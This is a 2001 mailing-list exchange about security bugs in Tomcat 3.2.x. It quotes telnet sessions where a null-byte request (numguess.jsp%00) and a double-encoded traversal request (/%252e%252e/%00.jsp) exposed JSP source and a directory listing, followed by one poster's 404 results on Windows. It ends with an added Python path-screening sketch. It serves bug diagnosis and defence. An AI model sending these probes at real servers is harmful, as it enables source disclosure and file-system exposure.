OK, I just tried this again (my results included inline) and in all cases I
get a 404 error. I'm using Win2000 and JDK1.2.2. I'll try testing with
JDK1.3 on Win2000 tomorrow and see if the problem follows the JDK version or
the operating system.
> -----Original Message-----
> From: Stephan Seyboth [mailto:[EMAIL PROTECTED]]
> Sent: Wednesday, April 04, 2001 9:08 AM
> To: [EMAIL PROTECTED]
> Subject: Re: TC3.2.x and security problems
>
[...]
>
> $ telnet localhost 8080
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> GET /examples/jsp/num/numguess.jsp
> HTTP/1.0 200 OK
> Content-Type: text/plain
> Content-Length: 1237
> Last-Modified: Tue, 03 Apr 2001 14:49:28 GMT
> Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
> Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
>
> [numguess.jsp source follows]
This one has been fixed in 3.2.2.
>
> $ telnet localhost 8180
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> GET /examples/jsp/num/numguess.jsp%00
> HTTP/1.0 200 OK
> Content-Type: text/plain
> Content-Length: 1237
> Last-Modified: Wed, 04 Apr 2001 10:37:30 GMT
> Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2;
> Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
>
> [numguess.jsp source follows]
My results on Win2000 with JDK1.2.2
GET /examples/jsp/num/numguess.jsp%00
HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 213
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2; Java 1.2.2; Windows NT 5.0 x86; java.vendor=Sun Microsystems Inc.)
<head><title>Not Found (404)</title></head>
<body><h1>Not Found (404)</h1>
<b>Original request:</b> /examples/jsp/num/numguess.jsp%00<br><br>
<b>Not found request:</b> /examples/jsp/num/numguess.jsp%00</body>
>
> $ telnet localhost 8180
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> GET /%252e%252e/%252e%252e/%00.jsp
>
> HTTP/1.0 200 OK
> Content-Type: text/html;charset=ISO-8859-1
> Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2;
> Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
>
> [directory listing follows]
My results on Win2000 with JDK1.2.2.
GET /%252e%252e/%252e%252e/%00.jsp
HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 207
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2; Java 1.2.2; Windows NT 5.0 x86; java.vendor=Sun Microsystems Inc.)
<head><title>Not Found (404)</title></head>
<body><h1>Not Found (404)</h1>
<b>Original request:</b> /%252e%252e/%252e%252e/%00.jsp<br><br>
<b>Not found request:</b> /%252e%252e/%252e%252e/%00.jsp</body>
I don't have JDK 1.3 on this machine so I'll have to wait until tomorrow to
see if the problem behavior follows the JDK version or the operating system.
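
Added example, not part of the original message and not Tomcat's own code: one way to screen request paths for the two probes quoted above before they reach a file lookup, by decoding until the text is stable and then rejecting NUL bytes, nested percent-encoding and `..` segments. The function names, reason labels and the decode-round cap are assumptions made for this sketch.

```python
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 5  # assumption: cap on nested percent-encoding layers


def decode_layers(path):
    """Percent-decode repeatedly; return (final_text, rounds_needed)."""
    rounds = 0
    while rounds < MAX_DECODE_ROUNDS:
        decoded = unquote(path, encoding="latin-1")
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def check_request_path(raw_path):
    """Return a sorted list of reasons to reject raw_path (empty = acceptable)."""
    reasons = set()
    # A '%' that is not followed by two hex digits is not a valid escape.
    if re.search(r"%(?![0-9A-Fa-f]{2})", raw_path):
        reasons.add("malformed-escape")
    decoded, rounds = decode_layers(raw_path)
    # More than one round means an escape was itself escaped (%252e -> %2e -> .).
    if rounds > 1:
        reasons.add("nested-encoding")
    # A decoded NUL can cut the name short when it reaches native file APIs.
    if "\x00" in decoded:
        reasons.add("nul-byte")
    # Check segments after full decoding, on both separator styles.
    if ".." in re.split(r"[/\\]", decoded):
        reasons.add("dot-dot-segment")
    return sorted(reasons)


# Request paths taken from the transcripts in this message, plus the plain path.
SAMPLES = [
    "/examples/jsp/num/numguess.jsp",
    "/examples/jsp/num/numguess.jsp%00",
    "/%252e%252e/%252e%252e/%00.jsp",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", check_request_path(sample) or "ok")
```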